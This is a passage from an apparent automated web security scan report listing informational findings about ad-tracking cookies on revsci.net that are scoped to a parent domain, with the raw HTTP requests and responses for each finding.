User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCVyCyiOI0VkRNa9Q=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:44 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6484&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:44 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:44 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.177. http://pix04.revsci.net/F08747/b3/0/3/1003161/449293090.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/449293090.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30xvkVUA6Ab/nfpD5Q==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:02 GMT; Path=/
NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; Domain=.revsci.net; Expires=Sun, 25-Jan-2043 15:13:02 GMT; Path=/
udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:02 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/449293090.js?D=DM_LOC%3Dabout%253Ablank%253F_rsiL%253D0%26DM_EOM%3D1&C=F08747 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30xvkVUA6Ab/nfpD5Q==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:02 GMT; Path=/
Set-Cookie: NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; Domain=.revsci.net; Expires=Sun, 25-Jan-2043 15:13:02 GMT; Path=/
Set-Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:02 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 645
Date: Wed, 02 Feb 2011 15:13:01 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{3}$)/,'$1');
rsiDom=rsiDom.
...[SNIP]...

11.178. http://pix04.revsci.net/F08747/b3/0/3/1003161/536378960.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/536378960.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69ODFkGTSOM1VkQHa9E=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:19 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98af&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:19 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/536378960.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXakvIXV+cer9duzVms/DJMc; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69ODFkGTSOM1VkQHa9E=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:19 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98af&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:19 GMT; Path=/
X-Proc-ms: 9
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:18 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.179. http://pix04.revsci.net/F08747/b3/0/3/1003161/555347891.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/555347891.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV+ETiSM1VkRda9U=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:53 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e648d&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:53 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/555347891.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV+ETiSM1VkRda9U=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:53 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e648d&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:53 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:52 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.180. http://pix04.revsci.net/F08747/b3/0/3/1003161/555347891.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/555347891.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30zvUZeC6gb/mh9D/g==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:06 GMT; Path=/
NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e82&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:13:06 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/555347891.js?D=DM_LOC%3Dabout%253Ablank%253F_rsiL%253D0%26DM_EOM%3D1&C=F08747 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: pix04.revsci.net
